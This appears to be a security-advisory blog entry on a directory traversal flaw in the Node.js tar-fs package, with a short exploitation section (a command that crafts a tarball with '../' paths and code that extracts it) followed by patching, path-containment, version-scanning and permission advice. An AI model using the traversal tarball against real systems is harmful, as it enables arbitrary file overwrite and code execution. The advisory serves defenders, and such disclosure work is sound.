How the CVE Works:
The vulnerability in `tar-fs` (versions <1.16.5, 2.0.0-2.1.2, 3.0.0-3.0.8) allows malicious tarballs to extract files outside the specified directory due to insufficient path sanitization. Attackers can craft a tarball with relative paths (e.g., `../../../malicious.sh`) that escape the target directory during extraction. This leads to arbitrary file overwrites, enabling remote code execution (RCE) or system compromise if `tar-fs` processes untrusted archives. The issue stems from improper validation of symbolic links and absolute paths in the extraction logic.
DailyCVE Form:
Platform: Node.js (tar-fs)
Version: <1.16.5, 2.0.0-2.1.2, 3.0.0-3.0.8
Vulnerability: Directory Traversal
Severity: Critical
Date: Jun 3, 2025
Prediction: Patch expected by Jun 10, 2025
What Undercode Say:
Exploitation:
1. Craft malicious tarball:
mkdir -p "../../evil_dir" && tar -cvf exploit.tar ../../evil_dir/malicious.js
2. Trigger extraction:
const tar = require('tar-fs');
const fs = require('fs');
// tar.extract(dir) returns a writable stream; the archive is piped into it.
// On vulnerable versions, entries with ../ components land outside ./target.
fs.createReadStream('exploit.tar').pipe(tar.extract('./target'));
Protection:
1. Update immediately:
npm install [email protected] --save
2. Sanitize paths manually (the `ignore` callback returns true to skip an entry; tar-fs hands it the already-joined output path, so compare that against the destination):
const path = require('path');
const fs = require('fs');
const tar = require('tar-fs');

// Compare against the destination plus a separator so a sibling such as
// /target2 is not accepted as being "inside" /target.
const safeExtract = (archivePath, dest) => {
  const absDest = path.resolve(dest);
  const isInside = (name) => {
    const target = path.resolve(absDest, name);
    return target === absDest || target.startsWith(absDest + path.sep);
  };
  return fs.createReadStream(archivePath)
    .pipe(tar.extract(absDest, { ignore: (name) => !isInside(name) }));
};
Detection:
1. Scan for vulnerable versions (including transitive dependencies; the pattern covers every affected range, not only the last patch level of each line):
npm ls tar-fs --all | grep -E 'tar-fs@(0\.[0-9.]+|1\.([0-9]|1[0-5])\.[0-9]+|1\.16\.[0-4]|2\.0\.[0-9]+|2\.1\.[0-2]|3\.0\.[0-8])([^0-9]|$)'
2. Audit logs for suspicious extracts:
grep -r "tar-fs" /var/log/ | grep -i "extract"
Mitigations:
- Restrict filesystem permissions:
chmod -R 750 /target/directory
- Use the `ignore` option (tar-fs passes the joined output path, in which `path.join` has already collapsed `..` segments, so test containment rather than searching the string for `..`):
const path = require('path');
const fs = require('fs');
const tar = require('tar-fs');

const dest = path.resolve('./dest');
fs.createReadStream('file.tar').pipe(tar.extract(dest, {
  ignore: (p) => !(p === dest || p.startsWith(dest + path.sep)),
}));
Reported By: github.com